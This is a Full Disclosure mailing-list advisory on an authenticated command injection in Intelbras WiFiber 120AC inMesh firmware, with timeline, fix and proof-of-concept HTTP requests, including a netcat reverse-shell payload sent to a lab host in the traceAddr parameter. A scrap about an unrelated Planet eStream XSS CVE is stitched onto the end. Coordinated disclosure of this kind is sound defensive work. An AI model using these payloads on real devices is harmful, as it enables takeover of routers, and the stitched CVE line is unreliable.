Recommendation

\-------------------------------------------------------------------------------

CyberDanube recommends Intelbras customers to upgrade the firmware to the
latest version available.


Contact Timeline

\-------------------------------------------------------------------------------

2022-08-02: Contacting Intelbras via suporte () intelbras com br.
2022-08-03: Request from Intelbras to send the advisory to
csirt () intelbras com br; Sent the advisory to this address.
2022-08-30: Asked for status update; Vendor answered that the new firmware

            version has been released the day before. Set the disclosure date

            to 2022-10-03 (60 days policy).
2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
2022-10-09: Coordinated disclosure of advisory.


Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2022

On 09.10.22 17:21, Thomas Weber wrote:

> CyberDanube Security Research 20221009-0
> 
> \-------------------------------------------------------------------------------
> 
>                title| Authenticated Command Injection
>              product| Intelbras WiFiber 120AC inMesh
>   vulnerable version| 1.1-220216
>        fixed version| 1-1-220826
>           CVE number|
>               impact| High
>             homepage| https://www.intelbras.com
>                found| 2022-08-01
>                   by| T. Weber (Office Vienna)
>                     | CyberDanube Security Research
>                     | Vienna | St. Pölten
>                     |
>                     | https://www.cyberdanube.com
> 
> \-------------------------------------------------------------------------------
> 
> Vendor description
> 
> \------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovative solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an INspiration and a promising idea: to manufacture PABX centrals. During the 80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s
> 
> were marked by the consolidation of the company in the telecommunications
> 
> segment and we became leaders in the PABX and telephone terminals segment. The
> 
> turn of the millennium represented the search for greater connection and
> 
> proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing
> 
> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.
> 
> We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our
> 
> DNA, increasingly present in our daily lives. And it was only possible to
> 
> write a story so full of achievements because employees, partners and customers
> 
> were close and believed in us."
> 
> Source: https://www.intelbras.com/en/institutional/who-we-are
> 
> Vulnerable versions
> 
> \-------------------------------------------------------------------------------
> 
> WiFiber 120AC inMesh / 1.1-220216
> 
> 
> Vulnerability overview
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> 
> The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can
> 
> be done by an attacker.
> 
> 
> Proof of Concept
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> The web server is prone to an authenticated command injection via POST
> 
> parameters. The following proof-of-concept shows how to inject the command
> 
> "ls /" to the system which gets executed in the background:
> 
> \===============================================================================
> 
> POST /boaform/formPing6 HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 87
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/ping6.asp
> Upgrade-Insecure-Requests: 1
> 
> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================
> 
> The following commands can be used to open a reverse shell:
> 
> "rm -f /tmp/f"
> "mkfifo /tmp/f"
> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"
> 
> Those commands were sent via a crafted POST request:
> 
> \===============================================================================
> 
> POST /boaform/formTracert HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 255
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/tracert.asp
> Upgrade-Insecure-Requests: 1
> 
> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================
> 
> The vulnerability was manually verified on an emulated device by using the
> 
> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
> 
> 
> Solution
> 
> \-------------------------------------------------------------------------------
> 
> Update to firmware version 1-1-220826.
> 
> https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip
> 
> Workaround
> 
> \-------------------------------------------------------------------------------
> 
> None
> 
> 
> Recommendation
> 
> \-------------------------------------------------------------------------------
> 
> CyberDanube recommends Intelbras customers to upgrade the firmware to the
> latest version available.
> 
> 
> Contact Timeline
> 
> \-------------------------------------------------------------------------------
> 
> 2022-08-02: Contacting Intelbras via suporte () intelbras com br.
> 2022-08-03: Request from Intelbras to send the advisory to
> csirt () intelbras com br; Sent the advisory to this address.
> 
> 2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date
> 
>             to 2022-10-03 (60 days policy).
> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
> 2022-10-09: Coordinated disclosure of advisory.
> 
> 
> Web: https://www.cyberdanube.com
> Twitter: https://twitter.com/cyberdanube
> Mail: research at cyberdanube dot com
> 
> EOF T. Weber / @2022

**Attachment: smime.p7s**  
_Description:_ S/MIME Cryptographic Signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh** _Thomas Weber (Dec 13)_

CVE-2022-40005: Full Disclosure: Re: CyberDanube Security Research 20221009-0

In Planet eStream before 6.72.10.07, multiple Stored Cross-Site Scripting (XSS) vulnerabilities exist: Disclaimer, Search Function, Comments, Batch editing tool, Content Creation, Related Media, Create new user, and Change Username.

Tag

#acer